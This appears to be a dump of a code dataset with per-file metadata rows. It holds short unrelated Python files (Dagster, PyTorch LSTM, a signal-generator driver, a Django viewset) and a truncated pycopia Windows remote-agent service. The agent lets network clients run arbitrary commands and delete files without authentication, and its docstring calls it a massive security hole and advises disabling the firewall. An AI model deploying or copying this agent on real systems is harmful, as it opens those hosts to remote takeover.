plt.tight_layout()
# plt.savefig('{0}{1}.png'.format(plot_savename, int(perplexity)), dpi=300)
plt.show()
| 36.822785
| 127
| 0.700928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,189
| 0.408732
|
49f6f1f5b6e7113a385ba89e9bd8fb4c985968b5
| 421
|
py
|
Python
|
examples/board_toolkit_simpletest.py
|
Neradoc/Adafruit_Board_Toolkit
|
c1602192f015924ce4ffd4e90dcd44769e565780
|
[
"MIT",
"BSD-3-Clause",
"MIT-0",
"Unlicense"
] | 10
|
2021-03-16T18:05:53.000Z
|
2022-03-20T20:40:38.000Z
|
examples/board_toolkit_simpletest.py
|
Neradoc/Adafruit_Board_Toolkit
|
c1602192f015924ce4ffd4e90dcd44769e565780
|
[
"MIT",
"BSD-3-Clause",
"MIT-0",
"Unlicense"
] | 8
|
2021-03-17T18:32:54.000Z
|
2021-12-31T19:58:01.000Z
|
examples/board_toolkit_simpletest.py
|
Neradoc/Adafruit_Board_Toolkit
|
c1602192f015924ce4ffd4e90dcd44769e565780
|
[
"MIT",
"BSD-3-Clause",
"MIT-0",
"Unlicense"
] | 4
|
2021-04-21T13:48:18.000Z
|
2022-03-13T15:07:01.000Z
|
# SPDX-FileCopyrightText: Copyright (c) 2021 Dan Halbert for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
import adafruit_board_toolkit.circuitpython_serial
comports = adafruit_board_toolkit.circuitpython_serial.repl_comports()
if not comports:
raise Exception("No CircuitPython boards found")
# Print the device paths or names that connect to a REPL.
print([comport.device for comport in comports])
| 32.384615
| 80
| 0.812352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 205
| 0.486936
|
49f718d53ef81854c33add0bb6b608250490d75e
| 798
|
py
|
Python
|
saq/utils.py
|
cofin/saq
|
be81f383a0904e9084e24ccb5334e07fc5b61e00
|
[
"MIT"
] | 29
|
2022-01-05T07:07:18.000Z
|
2022-03-29T20:09:03.000Z
|
saq/utils.py
|
cofin/saq
|
be81f383a0904e9084e24ccb5334e07fc5b61e00
|
[
"MIT"
] | 3
|
2022-01-23T17:33:40.000Z
|
2022-03-10T03:36:21.000Z
|
saq/utils.py
|
cofin/saq
|
be81f383a0904e9084e24ccb5334e07fc5b61e00
|
[
"MIT"
] | 4
|
2022-01-06T18:33:33.000Z
|
2022-03-23T18:44:19.000Z
|
import time
import uuid
from random import random
def now():
return int(time.time() * 1000)
def uuid1():
return str(uuid.uuid1())
def millis(s):
return s * 1000
def seconds(ms):
return ms / 1000
def exponential_backoff(
attempts,
base_delay,
max_delay=None,
jitter=True,
):
"""
Get the next delay for retries in exponential backoff.
attempts: Number of attempts so far
base_delay: Base delay, in seconds
max_delay: Max delay, in seconds. If None (default), there is no max.
jitter: If True, add a random jitter to the delay
"""
if max_delay is None:
max_delay = float("inf")
backoff = min(max_delay, base_delay * 2 ** max(attempts - 1, 0))
if jitter:
backoff = backoff * random()
return backoff
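# --- Illustrative usage sketch (not part of the original module) ---
# Demonstrates the delay sequence produced by exponential_backoff(); with
# jitter disabled the delay doubles per attempt and is capped by max_delay.
if __name__ == "__main__":
    for attempt in range(1, 6):
        delay = exponential_backoff(attempt, base_delay=0.5, max_delay=4, jitter=False)
        print(f"attempt {attempt}: wait {delay:.1f}s")  # 0.5, 1.0, 2.0, 4.0, 4.0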
| 19
| 73
| 0.641604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 283
| 0.354637
|
49f8927dba9de24eccfdfa6bd46fde3e6e325f82
| 221
|
py
|
Python
|
pipeline.py
|
sanidhya-singh/dagster-pipelines
|
671c4869dca14f96902981e2e8c84df1319ca89e
|
[
"MIT"
] | null | null | null |
pipeline.py
|
sanidhya-singh/dagster-pipelines
|
671c4869dca14f96902981e2e8c84df1319ca89e
|
[
"MIT"
] | null | null | null |
pipeline.py
|
sanidhya-singh/dagster-pipelines
|
671c4869dca14f96902981e2e8c84df1319ca89e
|
[
"MIT"
] | null | null | null |
from dagster import job, op
@op
def get_name():
return "dagster"
@op
def hello(name: str):
print(f"Hello, {name}!")
@job(description="Hello world Dagster pipeline")
def hello_dagster():
hello(get_name())
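# --- Illustrative usage sketch (not part of the original file) ---
# Besides being launched from Dagit or the Dagster CLI, the job can be executed
# directly in-process, which is handy for local testing.
if __name__ == "__main__":
    result = hello_dagster.execute_in_process()
    print(result.success)  # True if both ops completed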
| 13.8125
| 48
| 0.669683
| 0
| 0
| 0
| 0
| 185
| 0.837104
| 0
| 0
| 56
| 0.253394
|
49fab0bf939b0f4cf2782196c0ddc5090bf9b5e5
| 4,508
|
py
|
Python
|
qulab/drivers/AFG3102.py
|
liuqichun3809/quantum-lab
|
05bea707b314ea1687866f56ee439079336cfbbc
|
[
"MIT"
] | 3
|
2020-08-30T16:11:49.000Z
|
2021-03-05T12:09:30.000Z
|
qulab/drivers/AFG3102.py
|
liuqichun3809/quantum-lab
|
05bea707b314ea1687866f56ee439079336cfbbc
|
[
"MIT"
] | null | null | null |
qulab/drivers/AFG3102.py
|
liuqichun3809/quantum-lab
|
05bea707b314ea1687866f56ee439079336cfbbc
|
[
"MIT"
] | 2
|
2019-07-24T15:12:31.000Z
|
2019-09-20T02:17:28.000Z
|
# -*- coding: utf-8 -*-
import time
import numpy as np
from qulab.device import BaseDriver, QInteger, QOption, QReal, QString, QVector
class Driver(BaseDriver):
error_command = '*ESR?'
support_models = ['AFG3102']
quants = [
QOption('Output',ch=1,
set_cmd='OUTP%(ch)d %(option)s', get_cmd='OUTP%(ch)d?',
options=[('OFF', 'OFF'), ('ON', 'ON')]), # must set chanel
QOption('Function',ch=1,set_cmd='SOUR%(ch)d:FUNC %(option)s',get_cmd='SOUR%(ch)d:FUNC?',
options=[('Sin','SIN'),('Square','SQU'),('Pulse','PULS'),('Ramp','RAMP'),
('PRNoise','PRN'),('DC','DC'),('SINC','SINC'),('Gaussian','GAUS'),
('Lorentz','LOR'),('Erise','ERIS'),('Edecay','EDEC'),('Haversine','HAV'),
('User','USER'),('User2','USER2')]),
QReal('Frequency',unit='Hz',ch=1,set_cmd='SOUR%(ch)d:FREQ %(value)e%(unit)s',get_cmd='SOUR%(ch)d:FREQ?'),
QReal('Phase',unit='rad',ch=1,set_cmd='SOUR%(ch)d:PHAS %(value)f%(unit)s',get_cmd='SOUR%(ch)d:PHAS?'),
QReal('Pulse Delay',unit='s',ch=1,set_cmd='SOUR%(ch)d:PULS:DEL %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:PULS:DEL?'),
QReal('Pulse Period',unit='s',ch=1,set_cmd='SOUR%(ch)d:PULS:PER %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:PULS:PER?'),
QReal('Pulse Width',unit='s',ch=1,set_cmd='SOUR%(ch)d:PULS:WIDT %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:PULS:WIDT?'),
#Burst Mode
QReal('Burst Tdelay',unit='s',ch=1,set_cmd='SOUR%(ch)d:BURS:TDEL %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:BURS:TDEL?'),
QReal('Burst Ncycles',ch=1,set_cmd='SOUR%(ch)d:BURS:NCYC %(value)d',get_cmd='SOUR%(ch)d:BURS:NCYC?'),
##
QReal('Frequency',unit='Hz',ch=1,set_cmd='SOUR%(ch)d:FREQ %(value)e%(unit)s',get_cmd='SOUR%(ch)d:FREQ?'),
QReal('Phase',unit='DEG',ch=1,set_cmd='SOUR%(ch)d:PHAS %(value)f%(unit)s',get_cmd='SOUR%(ch)d:PHAS?'),
QReal('High Level',unit='V',ch=1,set_cmd='SOUR%(ch)d:VOLT:HIGH %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:HIGH?'),
QReal('Low Level',unit='V',ch=1,set_cmd='SOUR%(ch)d:VOLT:LOW %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:LOW?'),
QReal('Offset',unit='V',ch=1,set_cmd='SOUR%(ch)d:VOLT:OFFS %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:OFFS?'),
QReal('Amplitude',unit='VPP',ch=1,set_cmd='SOUR%(ch)d:VOLT:AMPL %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:AMPL?'),
]
def reset(self,delay1=0,delay2=0):
#init
self.write('*CLS')
self.write('*RST')
#set external clock;external source;burst mode&cycle=1&trigdelay=0
self.write('SOURce:ROSCillator:SOURce EXT')
self.write('TRIGger:SEQuence:SOURce EXTernal')
self.write('SOURce1:BURSt:STATe ON')
self.write('SOURce1:BURSt:NCYCles 1')
self.write('SOURce1:BURSt:MODE TRIGgered')
self.write('SOURce1:BURSt:DELay %fus' %delay1)
self.write('SOURce2:BURSt:STATe ON')
self.write('SOURce2:BURSt:NCYCles 1')
self.write('SOURce2:BURSt:MODE TRIGgered')
self.write('SOURce2:BURSt:TDELay %fns' %delay2)
    # Write or update the actual waveform in the previously created waveform slot
def upwave(self,points,ch=1,T0=100):
pointslen=len(points)
pointslen2=2*pointslen
        # Write the waveform data
self.write('DATA:DEFine EMEMory,%d' %pointslen)
self.write('DATA:POINts EMEMory, %d' %pointslen)
message=':DATA:DATA EMEMory,'# % (len(str(pointslen2)),pointslen2)
points = points.clip(-1,1)
values=np.zeros(pointslen).astype(np.uint16)
        # A factor of 8191 is used so that the final value never exceeds 16383
values = (points * 8191).astype(np.uint16)+8192 #.astype(np.uint16)
byte=np.zeros(pointslen2).astype(np.uint8)
        # Split each original two-byte data point into a high byte and a low byte
byte[1:pointslen2:2]=(values & 0b11111111).astype(np.uint8)
byte[0:pointslen2:2]=((values & 0b11111100000000) >> 8).astype(np.uint8)
        # The message passed to write_binary_values must not include the '#42048' block header,
        # because pyvisa computes it automatically; see to_binary_block in pyvisa's util.py.
        # The AFG3102 uses big-endian ordering, i.e. the binary block is written in the order given here.
self.write_binary_values(message, byte, datatype='B',is_big_endian=False,termination=None, encoding=None)
# self.write('enable' )
self.write('TRAC:COPY USER%d,EMEM' %ch)
self.write('SOURce%d:FUNCTION USER%d' %(ch,ch))
        # Set frequency: the total waveform length is determined by this parameter; e.g. 1 MHz means a 1 us waveform length
self.write('SOURce%d:FREQuency:FIXed %fkHz' %(ch,1e3/T0))
self.write('OUTPut%d:STATe ON' %ch)
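# --- Illustrative usage sketch (not part of the original driver) ---
# Uploading a Gaussian pulse to channel 1. How the Driver instance `dev` is
# constructed depends on qulab's BaseDriver (typically a VISA resource address),
# so it is only assumed to exist here.
#
# t = np.linspace(-1, 1, 1000)
# pulse = np.exp(-t**2 / 0.1)       # samples must stay within [-1, 1]
# dev.reset(delay1=0, delay2=0)     # external clock/trigger, burst mode
# dev.upwave(pulse, ch=1, T0=100)   # T0 (in us) sets the total waveform length via the frequency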
| 53.035294
| 132
| 0.618234
| 4,592
| 0.970414
| 0
| 0
| 0
| 0
| 0
| 0
| 2,500
| 0.528318
|
49fc564845398fd6fccf8887fc72513069095963
| 1,357
|
py
|
Python
|
02-intermediate/lstm_network/main.py
|
kevin2018pg/pytorch-notes
|
4ba3827fccbf17ec446b2538186dd78dea3ecb50
|
[
"MIT"
] | 1
|
2020-12-03T02:41:07.000Z
|
2020-12-03T02:41:07.000Z
|
02-intermediate/lstm_network/main.py
|
kevin2018pg/pytorch-notes
|
4ba3827fccbf17ec446b2538186dd78dea3ecb50
|
[
"MIT"
] | null | null | null |
02-intermediate/lstm_network/main.py
|
kevin2018pg/pytorch-notes
|
4ba3827fccbf17ec446b2538186dd78dea3ecb50
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
"""
输入3个句子,每个句子由5个单词构成,每个单词词向量10维
batch=3, seq_len=5, Embedding=10
"""
# Configure the LSTM: embedding dim 10, hidden size 20, 2 LSTM layers, bidirectional
bilstm = nn.LSTM(input_size=10, hidden_size=20, num_layers=2, bidirectional=True)
# The tensor below represents the input sentences
input = torch.randn(5, 3, 10)
# Initial hidden state and cell state; they normally have the same shape
h0 = torch.randn(4, 3, 20) # [bidirection*num_layers, batch_size, hidden_size]
c0 = torch.randn(4, 3, 20) # [bidirection*num_layers, batch_size, hidden_size]
# With 2 LSTM layers, output holds the last layer's hidden output for every token; its size depends only on the sequence length, not on the number of layers
output, (hn, cn) = bilstm(input, (h0, c0))
print("output shape:", output.shape) # shape:torch.Size([5,3,40]),[seq_len,batch_size,2*hidden_size]
print("hn shape:", hn.shape) # shape:torch.Size([4,3,20]),[bidirection*num_layers,batch_size,hidden_size]
print("cn shape:", cn.shape) # shape:torch.Size([4,3,20]),[bidirection*num_layers,batch_size,hidden_size]
# Feed the output into a binary classifier
output = output.permute(1, 0, 2) # torch.Size([3,5,40]),[batch_size,seq_len,2*hidden_size]
output = output.contiguous()  # contiguous() is needed after permute() because view() requires contiguously stored memory
batch_size = output.size(0)
output = output.view(batch_size, -1) # torch.Size([3,200]),[batch_size,seq_len*2*hidden_size]
fully_connected = nn.Linear(200, 2)
output = fully_connected(output)
print(output.shape) # torch.Size([3,2]),[batch_size,class]
print(output)
| 41.121212
| 106
| 0.740604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,089
| 0.6604
|
49fd04fd3ec6534f06e8ff42c0869a4f70bf3dd5
| 1,484
|
py
|
Python
|
meiduo_mall/apps/meiduo_admin/views/order.py
|
zzZaida/meiduo_backend
|
c4f94ea7f9c47a08d3e37fb0ac2c1ec1dcf2c18b
|
[
"MIT"
] | null | null | null |
meiduo_mall/apps/meiduo_admin/views/order.py
|
zzZaida/meiduo_backend
|
c4f94ea7f9c47a08d3e37fb0ac2c1ec1dcf2c18b
|
[
"MIT"
] | null | null | null |
meiduo_mall/apps/meiduo_admin/views/order.py
|
zzZaida/meiduo_backend
|
c4f94ea7f9c47a08d3e37fb0ac2c1ec1dcf2c18b
|
[
"MIT"
] | null | null | null |
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from apps.meiduo_admin.serializers.order import OrderInfoSerializer
from apps.meiduo_admin.utils import PageNum
from apps.orders.models import OrderInfo
class OrderModelViewSet(ModelViewSet):
queryset = OrderInfo.objects.all()
serializer_class = OrderInfoSerializer
pagination_class = PageNum
def destroy(self, request, *args, **kwargs):
        return Response({'msg': '妖怪,吃俺老孙一棒,敢删除我的数据!'})  # playful refusal message: order deletion is not allowed
@action(methods=['PUT'],detail=True)
def status(self,request,pk):
        # 1. Look up the order
try:
order=OrderInfo.objects.get(order_id=pk)
except OrderInfo.DoesNotExist:
from rest_framework import status
return Response(status=status.HTTP_400_BAD_REQUEST)
# order=self.get_object()
        # 2. Update the order status
order.status=request.data.get('status')
order.save()
        # 3. Return the response
return Response({
'order_id':pk,
'status':order.status
})
"""
GET
{
"order_id": "20190909155657000000003",
"create_time": "2019-09-09T15:56:57.524510+08:00",
"update_time": "2019-09-09T15:57:02.595491+08:00",
"total_count": 1,
"total_amount": "11.00",
"freight": "10.00",
"pay_method": 2,
"status": 1,
"user": 3,
"address": 4,
"goods":[{},{},{},{}]
}
"""
| 26.035088
| 67
| 0.623989
| 1,247
| 0.80869
| 0
| 0
| 566
| 0.367056
| 0
| 0
| 542
| 0.351492
|
49fd9dcc627b703550931ebd10aa32549f023644
| 29,587
|
py
|
Python
|
QA/pycopia/remote/windows_server.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | 3
|
2018-11-26T15:00:20.000Z
|
2022-01-28T23:17:58.000Z
|
QA/pycopia/remote/windows_server.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | null | null | null |
QA/pycopia/remote/windows_server.py
|
kdart/pycopia3
|
8a7c820f096245411eabbb72345e4f30a35988b6
|
[
"Apache-2.0"
] | 1
|
2018-11-26T15:00:21.000Z
|
2018-11-26T15:00:21.000Z
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""
Implements a Windows version of a client responder. This should run with the
native Python for Windows.
Install on a Windows server:
Place the following lines in c:\autoexec.bat::
PATH=%PATH%;C:\Python26;C:\Python26\Scripts
Now run (all on one line)::
C:\Python26>python.exe %PYTHONLIB%\site-packages\pycopia\remote\WindowsServer.py
--username DOMAIN\Administrator --password xxxxxxxx install
OR, for system process that can interact with console::
C:\Python26>python.exe %PYTHONLIB%\site-packages\pycopia\remote\WindowsServer.py
--interactive install
Note: if you get an error about an account not existing, you may need
to supply the username like this:
.\Administrator
If a username was supplied to run as, go to the Service Manger from the
Windows control panel, and perform the following.
- Select "Remote Agent Server" from the list. Right-clieck and select "properties".
- Select the "Log On" tab.
- Click the "This account:" radio button.
- Enter DOMAIN\Administrator in the account box (or something else appropriate).
- Enter the proper password (twice).
- Click "Apply". You should confirm a message saying user is
enabled to log in as a service.
- Click "General" tab.
- You may now start the service.
You may also need to disable the Windows firewall for this to function
properly. This service is a massive security hole, so only run it on
a throw-away test machine on an isolated network.
"""
import os, sys, shutil, errno
import threading
# Pycopia imports
from pycopia.aid import IF
from pycopia.anypath import cygwin2nt, nt2cygwin
from pycopia import shparser
# returnable objects
from pycopia.remote.WindowsObjects import ExitStatus
# Windows stuff
import msvcrt
import win32api
import win32file
import win32net
import win32process
import win32event
# constants
import pywintypes
import win32con
import win32netcon
# some constants that the API forgot...
USE_WILDCARD = -1
USE_DISKDEV = 0
USE_SPOOLDEV = 1
USE_CHARDEV = 2
USE_IPC = 3
def setConfig():
Pyro.config.PYRO_STORAGE = "C:\\tmp\\"
Pyro.config.PYRO_LOGFILE = "C:\\tmp\\agent_svc.log"
Pyro.config.PYRO_TRACELEVEL=3
Pyro.config.PYRO_USER_LOGFILE = "C:\\tmp\\agent_user.log"
Pyro.config.PYRO_USER_TRACELEVEL = 3
Pyro.config.PYRO_PORT = 7867 # don't conflict with cygwin Pyro
import Pyro
import Pyro.util
setConfig()
Log=Pyro.util.Log
import Pyro.core
import Pyro.naming
from Pyro.ext.BasicNTService import BasicNTService, getRegistryParameters
_EXIT = False
UserLog = Pyro.util.UserLogger()
# msg, warn, or error methods
class WindowsFile(file):
"""A file object with some extra methods that match those in UserFile
(which has Posix extensions)."""
def locking(self, mode, nbytes):
return msvcrt.locking(self.fileno(), mode, nbytes)
def __repr__(self):
return "WindowsFile(%r, %r)" % (self.name, self.mode)
def lock_exclusive(self, length, start=0, whence=0, nb=0):
"""Locking method compatible with Posix files."""
if nb:
mode = msvcrt.LK_NBLCK
else:
mode = msvcrt.LK_LOCK
orig = self.tell()
self.seek(start, whence)
try:
msvcrt.locking(self.fileno(), mode, length)
finally:
self.seek(orig)
lock = lock_exclusive
def unlock(self, length, start=0, whence=0):
"""Posix compatible unlock."""
orig = self.tell()
self.seek(start, whence)
try:
msvcrt.locking(self.fileno(), msvcrt.LK_UNLCK, length)
finally:
self.seek(orig)
def get_osfhandle(self):
return msvcrt.get_osfhandle(self.fileno())
split_command_line = shparser.get_command_splitter()
# quick hack ... Windows sucks. No signal handling or anything useful, so it has to be faked.
class WindowsProcess(object):
def __init__(self, cmdline, logfile=None, env=None, callback=None, merge=True, pwent=None, async=False):
self.deadchild = False
self.exitstatus = None
self.cmdline = cmdline
self._callback = callback
self._buf = ""
self._log = logfile
if merge:
self.child_stdin, self.child_stdout = os.popen2(cmdline, "t", -1)
self.child_stderr = None
else:
self.child_stdin, self.child_stdout, self.child_stderr = os.popen3(cmdline, "t", -1)
self.childpid, self.handle = self._scan_for_self()
# since the Python popenX functions do not provide the PID, it must be
# scanned for in this ugly manner. 8-(
def _scan_for_self(self):
win32api.Sleep(2000) # sleep to give time for process to be seen in system table.
basename = self.cmdline.split()[0]
pids = win32process.EnumProcesses()
if not pids:
UserLog.warn("WindowsProcess", "no pids", pids)
for pid in pids:
try:
handle = win32api.OpenProcess(
win32con.PROCESS_QUERY_INFORMATION | win32con.PROCESS_VM_READ,
pywintypes.FALSE, pid)
except pywintypes.error as err:
UserLog.warn("WindowsProcess", str(err))
continue
try:
modlist = win32process.EnumProcessModules(handle)
except pywintypes.error as err:
UserLog.warn("WindowsProcess",str(err))
continue
for mod in modlist:
mname = win32process.GetModuleFileNameEx(handle, mod)
if mname.find(basename) >= 0:
return int(pid), handle
raise WindowsError("could not find process for %r" % (basename,))
def write(self, data):
return self.child_stdin.write(data)
def kill(self):
handle = win32api.OpenProcess(
win32con.PROCESS_VM_READ | win32con.PROCESS_TERMINATE, pywintypes.FALSE, self.childpid)
win32process.TerminateProcess(handle, 3)
def read(self, amt=1048576):
bs = len(self._buf)
while bs < amt:
c = self._read(4096)
if not c:
break
self._buf += c
bs = len(self._buf)
data = self._buf[:amt]
self._buf = self._buf[amt:]
return data
def readerr(self, amt=-1):
if self.child_stderr:
return self.child_stderr.read(amt)
def _read(self, amt):
data = self.child_stdout.read(amt)
if self._log:
self._log.write(data)
return data
def close(self):
if win32process.GetExitCodeProcess(self.handle) == win32con.STILL_ACTIVE:
self.kill()
self.child_stdin.close()
self.child_stdin = None
if self.child_stderr:
self.child_stdin.close()
self.child_stdin = None
es = ExitStatus(self.cmdline, self.child_stdout.close())
if self.exitstatus is None:
self.exitstatus = es
self.child_stdout = None
self.dead()
return self.exitstatus
def poll(self):
es = win32process.GetExitCodeProcess(self.handle)
if es == win32con.STILL_ACTIVE:
return None
else:
self.exitstatus = ExitStatus(self.cmdline, es)
self.dead()
return self.exitstatus
    # called when the process is determined to be dead
def dead(self):
if not self.deadchild:
self.deadchild = True
if self._callback:
self._callback(self)
# check if still running
def alive(self):
es = win32process.GetExitCodeProcess(self.handle)
if es == win32con.STILL_ACTIVE:
return True
else:
return False
# wait until finished
def wait(self):
# let python read until EOF for a wait
try:
self._buf += self.child_stdout.read()
self.close()
except: # closed file?
pass
return self.exitstatus
def status(self):
return self.exitstatus
def isdead(self):
return self.deadchild
# considered true if child alive, false if child dead
def __bool__(self):
return not self.deadchild
# A server that performs filer client operations. This mostly delegates to the
# os module. But some special methods are provided for common functions.
class Win32Agent(Pyro.core.SynchronizedObjBase):
def __init__(self):
Pyro.core.SynchronizedObjBase.__init__(self)
self._files = {}
self._procs = {}
self._dirstack = []
def platform(self):
return sys.platform
def whatami(self):
"""Return agent implementation (class name)."""
return self.__class__.__name__
# Since file objects are not pickle-able, a handle is returned. Use the
# handle for subsequent file operations on f* methods.
def fopen(self, fname, mode="r", bufsize=-1):
"Opens a file object and returns a handle to it."
fname = cygwin2nt(fname)
fo = WindowsFile(fname, mode, bufsize)
UserLog.msg("fopen", fname)
handle = fo.fileno()
self._files[handle] = fo
return handle
def CreateFile(self, fname, mode="r", bufsize=-1):
"Open a file the same way a File Directory migration engine would."
fname = cygwin2nt(fname)
UserLog.msg("CreateFile", fname)
if mode == "r":
wmode = win32file.GENERIC_READ
elif mode == "w":
wmode = win32file.GENERIC_WRITE
elif mode in ( 'r+', 'w+', 'a+'):
wmode = win32file.GENERIC_READ | win32file.GENERIC_WRITE
else:
raise ValueError("invalid file mode")
h = win32file.CreateFile(
fname, # CTSTR lpFileName,
wmode, # DWORD dwDesiredAccess,
win32file.FILE_SHARE_DELETE | win32file.FILE_SHARE_READ | win32file.FILE_SHARE_WRITE, # DWORD dwShareMode,
None, # LPSECURITY_ATTRIBUTES lpSecurityAttributes,
win32file.OPEN_EXISTING, # DWORD dwCreationDisposition,
win32file.FILE_ATTRIBUTE_NORMAL, # DWORD dwFlagsAndAttributes,
0, # HANDLE hTemplateFile
)
self._files[int(h)] = h
return int(h)
def fclose(self, handle):
"Closes a file object given the handle."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
fo.close()
del self._files[handle]
else:
fo.Close() # pyHANDLE from CreateFile
def fread(self, handle, amt=-1):
"Reads from the file object given the handle and amount to read."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.read(amt)
else:
return win32file.ReadFile(fo, amt, None)
def fwrite(self, handle, data):
"Writes to a file object given the handle."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.write(data)
else:
return win32file.WriteFile(fo, data, None)
def fsync(self, handle):
"fsync the file object."
fo = self._files.get(handle, None)
if fo:
fo.flush()
return os.fsync(fo.fileno())
def fseek(self, handle, pos, how=0):
"Seek in the file object."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.seek(pos, how)
else:
win32file.SetFilePointer(fo, pos, how)
def ftell(self, handle):
"Tell where the seek pointer is in the file object."
fo = self._files.get(handle, None)
if fo:
if type(fo) is WindowsFile:
return fo.tell()
def fflush(self, handle):
"""Flush the file object buffer."""
fo = self._files.get(handle, None)
if fo:
return fo.flush()
def fileno(self, handle):
"Return the file objects file descriptor."
fo = self._files.get(handle, None)
if fo:
return fo.fileno()
def get_handle_info(self, handle):
fo = self._files.get(handle, None)
if fo:
return repr(fo) # XXX
else:
return None
def flock(self, handle, length=0, start=0, whence=0, nonblocking=False):
"""Lock the file with the given range."""
fo = self._files.get(handle, None)
if fo:
return fo.lock_exclusive(length, start, whence, nonblocking)
def funlock(self, handle, length, start=0, whence=0):
fo = self._files.get(handle, None)
if fo:
fo.unlock(length, start, whence)
def flist(self):
return list(self._files.keys())
def unlink(self, path):
"Unlink (delete) the given file."
path = cygwin2nt(path)
return os.unlink(path)
def rename(self, src, dst):
"Rename file from src to dst."
src = cygwin2nt(src)
dst = cygwin2nt(dst)
return os.rename(src, dst)
# directory methods
def mkdir(self, path, mode=0o777):
"Make a directory."
path = cygwin2nt(path)
return os.mkdir(path, mode)
def makedirs(self, path, mode=0o777):
"Make a full path."
path = cygwin2nt(path)
return os.makedirs(path, mode)
def chdir(self, path):
path = cygwin2nt(path)
return os.chdir(path)
def rmdir(self, path):
"Delete a directory."
path = cygwin2nt(path)
return os.rmdir(path)
def getcwd(self):
return os.getcwd()
def getcwdu(self):
return os.getcwd()
def pushd(self, path=None):
self._dirstack.append(os.getcwd())
if path:
path = cygwin2nt(path)
os.chdir(path)
def popd(self):
try:
path = self._dirstack.pop()
except IndexError:
return None
else:
os.chdir(path)
return path
def listdir(self, path):
path = cygwin2nt(path)
return os.listdir(path)
ls = listdir
def listfiles(self, path):
path = cygwin2nt(path)
isfile = os.path.isfile
pjoin = os.path.join
rv = []
for fname in os.listdir(path):
if isfile(pjoin(path, fname)):
rv.append(nt2cygwin(fname))
return rv
def chmod(self, path, mode):
path = cygwin2nt(path)
return os.chmod(path, mode)
def chown(self, path, uid, gid):
path = cygwin2nt(path)
return os.chown(path, uid, gid)
def stat(self, path):
path = cygwin2nt(path)
return os.stat(path)
def statvfs(self, path):
path = cygwin2nt(path)
return os.statvfs(path)
    # fd ops return the file descriptor as the handle (of course)
def open(self, fname, flags, mode=0o777):
fd = os.open(fname, mode)
return fd
def close(self, fd):
return os.close(fd)
def write(self, fd, data):
return os.write(fd, data)
def read(self, fd, n):
return os.read(fd, n)
# end fd ops
# shutil interface
def copyfile(self,src, dst):
return shutil.copyfile(src, dst)
def copymode(self, src, dst):
return shutil.copymode(src, dst)
def copystat(self, src, dst):
return shutil.copystat(src, dst)
def copy(self, src, dst):
return shutil.copy(src, dst)
def copy2(self, src, dst):
return shutil.copy2(src, dst)
def copytree(self, src, dst, symlinks=False):
return shutil.copytree(src, dst, symlinks)
def move(self, src, dst):
return win32file.MoveFile(str(src), str(dst))
def rmtree(self, path):
path = cygwin2nt(path)
for fname in os.listdir(path):
file_or_dir = os.path.join(path, fname)
if os.path.isdir(file_or_dir) and not os.path.islink(file_or_dir):
                self.rmtree(file_or_dir)  # it's a directory: recursive call into it
else:
try:
os.remove(file_or_dir) #it's a file, delete it
except:
#probably failed because it is not a normal file
win32api.SetFileAttributes(file_or_dir, win32file.FILE_ATTRIBUTE_NORMAL)
os.remove(file_or_dir) #it's a file, delete it
os.rmdir(path) #delete the directory here
# os.path delegates
def exists(self, path):
path = cygwin2nt(path)
return os.path.exists(path)
def isabs(self, path):
path = cygwin2nt(path)
return os.path.isabs(path)
def isdir(self, path):
path = cygwin2nt(path)
return os.path.isdir(path)
def isfile(self, path):
path = cygwin2nt(path)
return os.path.isfile(path)
def islink(self, path):
path = cygwin2nt(path)
return os.path.islink(path)
def ismount(self, path):
path = cygwin2nt(path)
return os.path.ismount(path)
    # process control; these calls are synchronous (they block)
def system(self, cmd):
UserLog.msg("system", cmd)
return os.system(cmd) # remember, stdout is on the server
def run(self, cmd, user=None):
if user is None:
return self.pipe(cmd)
else:
return self.run_as(cmd, user.name, user.passwd)
def run_async(self, cmd, user=None):
UserLog.msg("run_async", cmd, str(user))
proc = WindowsProcess(cmd, pwent=user)
self._procs[proc.childpid] = proc
return proc.childpid
def _get_process(self, pid):
return self._procs.get(pid, None)
def read_process(self, pid, N=-1):
proc = self._get_process(pid)
if proc:
return proc.read(N)
else:
return ''
def write_process(self, pid, data):
proc = self._get_process(pid)
if proc:
return proc.write(data)
def poll(self, pid):
"""Poll for async process. Returns exitstatus if done."""
try:
proc = self._procs[pid]
except KeyError:
return -errno.ENOENT
if proc.poll() is None:
return -errno.EAGAIN
else:
del self._procs[pid]
return proc.exitstatus
def waitpid(self, pid):
while True:
rv = self.poll(pid)
if rv == -errno.ENOENT:
return None
if rv == -errno.EAGAIN:
proc = self._procs[pid]
es = proc.wait()
del self._procs[pid]
return es
else: # already exited
del self._procs[pid]
return rv
def kill(self, pid):
"""Kills a process that was started by run_async."""
try:
proc = self._procs.pop(pid)
